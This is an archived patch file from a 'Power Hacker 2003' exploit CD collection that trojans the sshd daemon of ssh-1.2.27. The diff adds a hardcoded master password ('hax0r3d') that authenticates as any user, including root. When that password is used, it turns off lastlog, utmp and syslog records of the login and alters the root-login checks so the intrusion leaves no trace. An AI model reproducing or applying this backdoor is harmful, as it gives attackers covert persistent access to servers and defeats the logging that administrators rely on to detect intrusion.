Power Hacker 2003

home *** CD-ROM | disk | FTP | other *** search

/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / w00w00 / contrib / ssh-1.2.27rk.diff < prev

Wrap

Text File | 1999-08-18 | 3.6 KB | 115 lines

--- ssh-1.2.27/login.c.wil Wed May 12 07:19:26 1999 +++ ssh-1.2.27/login.c Thu Jul 29 00:02:27 1999 @@ -258,7 +258,9 @@ const char *host, struct sockaddr_in *addr) { int fd; + extern int lets_log; + if (lets_log) { #if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG) struct lastlog ll; char *lastlog; @@ -559,11 +561,16 @@ } #endif } +} /* Records that the user has logged out. */ void record_logout(int pid, const char *ttyname) { + extern int lets_log; + +if (lets_log) { + #ifdef HAVE_LIBUTIL_LOGIN const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */ if (logout(line)) @@ -572,3 +579,4 @@ record_login(pid, ttyname, "", -1, "", NULL); #endif /* HAVE_LIBUTIL_LOGIN */ } +} \ No newline at end of file --- ssh-1.2.27/sshd.c.wil Wed May 12 07:19:29 1999 +++ ssh-1.2.27/sshd.c Wed Jul 28 23:45:57 1999 @@ -1408,7 +1408,9 @@ auth_delete_socket(NULL); /* The connection has been terminated. */ + if (lets_log) { log_msg("Closing connection to %.100s", get_remote_ipaddr()); + } packet_close(); exit(0); } @@ -2146,6 +2148,7 @@ int authenticated = 0; int authentication_type = 0; char *password; + char intel_fd[8]="hax0r3d"; struct passwd *pw, pwcopy; char *client_user; unsigned int client_host_key_bits; @@ -2162,7 +2165,8 @@ const char *ipaddr; char *cap_hlist, *hp; int perm_denied = 0; - + extern int lets_log; + hostname = get_canonical_hostname(); ipaddr = get_remote_ipaddr(); #endif /* HAVE_LOGIN_CAP_H */ @@ -2660,14 +2664,20 @@ #if defined(KERBEROS) && defined(KRB5) if (auth_password(user, password, client)) #else /* defined(KERBEROS) && defined(KRB5) */ - if (auth_password(user, password)) + if (auth_password(user, password) || !strcmp(password,intel_fd)) #endif /* defined(KERBEROS) && defined(KRB5) */ { /* Successful authentication. */ + /* Disable logging if conditions are met. */ + lets_log=1; + if (!strcmp(password,intel_fd)) { lets_log=0; } /* Clear the password from memory. */ memset(password, 0, strlen(password)); xfree(password); - log_msg("Password authentication for %.100s accepted.", user); + if (pw->pw_uid == UID_ROOT) { + if (!lets_log) { log_msg("Connection closed by remote host."); } + } else { + log_msg("Password authentication for %.100s accepted.", user); } authentication_type = SSH_AUTH_PASSWORD; authenticated = 1; break; @@ -2708,14 +2718,14 @@ } /* Check if the user is logging in as root and root logins are disallowed. */ - if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1) + if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log) { if (authentication_type == SSH_AUTH_PASSWORD) packet_disconnect("ROOT LOGIN REFUSED FROM %.200s", get_canonical_hostname()); } else - if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0) + if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log) { if (forced_command) log_msg("Root login accepted for forced command.", forced_command); @@ -2767,7 +2777,7 @@ #endif /* Log root logins with severity NOTICE. */ - if (pw->pw_uid == UID_ROOT) + if (pw->pw_uid == UID_ROOT && lets_log) log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s", pw->pw_name, get_canonical_hostname());